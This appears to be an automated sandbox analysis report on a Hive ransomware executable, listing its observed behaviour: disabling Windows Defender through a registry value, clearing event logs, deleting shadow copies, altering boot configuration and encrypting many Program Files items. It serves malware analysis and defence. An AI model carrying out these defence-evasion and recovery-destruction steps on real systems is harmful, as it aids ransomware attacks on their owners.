Analysis Overview
SHA256
33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277
Threat Level: Known bad
The file 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe was found to be: Known bad.
Malicious Activity Summary
Hive
Modifies Windows Defender Real-time Protection settings
Deletes Windows Defender Definitions
Modifies security service
Clears Windows event logs
Modifies boot configuration data using bcdedit
Deletes shadow copies
Reads user/profile data of web browsers
Launches sc.exe
Drops file in Program Files directory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Modifies registry class
Runs net.exe
Runs ping.exe
Interacts with shadow copies
Opens file in notepad (likely ransom note)
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-05 13:28
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-05 13:28
Reported
2022-01-05 13:39
Platform
win7-en-20211208
Max time kernel
23s
Max time network
18s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Java\jre7\lib\management\jmxremote.password.template.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\tabskb.dll.mui | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationRight_SelectionSubpicture.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Goose_Bay.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Wallis.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\MANIFEST.MF.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-enumerations.xml.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.registry_3.5.400.v20140428-1507.jar.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-loaders_zh_CN.jar.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\an.txt.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\DvdTransform.fx | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Denver.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\La_Paz.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Mauritius.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\eclipse_update_120.jpg.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Europe\Amsterdam.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Africa\Ndjamena.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationUp_SelectionSubpicture.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\de-DE\DVDMaker.exe.mui | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Oslo.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\about.html.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.service.exsd.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services_3.4.0.v20140312-2051.jar.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad\osknumpadbase.xml | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\content-background.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets.nl_ja_4.4.0.v20140623020002.jar.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Atikokan.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\notification_plugin.jar.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Indiana\Petersburg.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\es-ES\msadcfr.dll.mui | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationUp_SelectionSubpicture.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\en-US\F12.dll.mui | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Currie.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.xml.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\license.html.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Atlantic\Bermuda.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Multiplayer\Checkers\de-DE\ChkrRes.dll.mui.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\es-ES\sqlxmlx.rll.mui | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\button-highlight.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\GoldRing.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\button-highlight.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkClientCP.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_zh_CN.jar.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-heapwalker.xml.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Belize.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\hwrfralm.dat | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationUp_ButtonGraphic.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\sonicsptransform.ax | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.c.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MST7MDT.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Multiplayer\Backgammon\ja-JP\bckgzm.exe.mui.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state_1.0.1.v20140709-1414.jar.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\jfr\profile.jfc.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_altgr.xml | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\de-DE\msdaremr.dll.mui | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\db\RELEASE-NOTES.html.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Barbados.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dili.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MET.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_IAAAACAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Europe\Samara.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\shadowonlyframe_selectionsubpicture.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\jsse.jar.3cvmXQQJfKKbi9e9xvA9JlrtoqFyA9s1soT5Top7KNn_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe
